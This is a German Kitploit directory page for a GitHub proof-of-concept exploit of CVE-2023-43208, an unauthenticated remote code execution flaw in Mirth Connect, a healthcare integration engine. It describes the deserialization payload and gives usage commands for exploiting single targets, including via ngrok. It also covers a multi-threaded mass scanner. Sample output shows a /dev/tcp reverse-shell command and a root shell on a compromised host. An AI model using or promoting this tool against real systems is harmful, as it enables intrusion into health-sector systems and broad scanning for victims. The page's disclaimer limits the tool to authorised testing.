Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-43208 — Ein PoC-Exploit für CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/4nuxd/cve-2023-43208
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Ein PoC-Exploit für CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

Proof-of-Concept-Exploit für CVE-2023-43208, eine nicht authentifizierte Remote-Code-Execution-Schwachstelle in Mirth Connect Versionen vor 4.4.1.


Beschreibung

Mirth Connect ist eine weit verbreitete Open-Source-Integrationsengine im Gesundheitswesen. Diese Schwachstelle nutzt einen Java-Deserialisierungsfehler über den Endpunkt /api/users aus, indem sie eine manipulierte XML-Nutzlast verwendet, die Apache Commons Collections-Gadgets verkettet, um eine nicht authentifizierte RCE zu erreichen.

Die erweiterte Version ersetzt den ursprünglichen pwncat-Listener durch eine vollständig abhängigkeitsfreie interaktive PTY-Shell, die nur Python-Builtins verwendet (socket, select, tty, termios). Die Shell wird bei Verbindung automatisch auf eine vollständige PTY aktualisiert.


Betroffene Versionen

SoftwareVerwundbare VersionenBehobene Version
Mirth Connect< 4.4.14.4.1+

Funktionen

  • Automatische Erkennung von Mirth-Connect-Instanzen
  • Versions-Fingerprinting und Schwachstellenprüfung
  • Nicht authentifizierte RCE über XML-Deserialisierungsnutzlast
  • Automatisches PTY-Shell-Upgrade (python3/python/script Fallback)
  • Korrekte Terminalgrößen-Weitergabe (stty rows/cols)
  • Massen-Scanner mit Multi-Threading-Unterstützung
  • Ausgabe verwundbarer Ziele in eine Datei
  • Keine pwncat-Abhängigkeit – nur Stdlib für den Listener

Installation

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Anforderungen

root@kitploit:~
requests
packaging
rich
alive-progress

Verwendung

Einzelziel — Shell erhalten

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Einzelziel — Mit ngrok / Bind-Port

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Massen-Scan aus Datei

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Argumente


Beispielausgabe

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und zu Bildungszwecken bestimmt.
Die nicht autorisierte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.
Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Credits

  • Programmiert von: K3ysTr0K3R und Chocapikk
  • Verbessert von: 4nuxd
Tool herunterladen
FlagBeschreibung
-u, --urlZiel-URL
-lh, --lhostIhre lauschende IP
-lp, --lportIhr lauschender Port
-bp, --bindportBind-Port-Überschreibung (nützlich mit ngrok)
-f, --fileDatei mit Liste der Ziel-URLs
-o, --outputVerwundbare Ziele in Datei speichern
-t, --threadsAnzahl der Threads für den Scan (Standard: 50)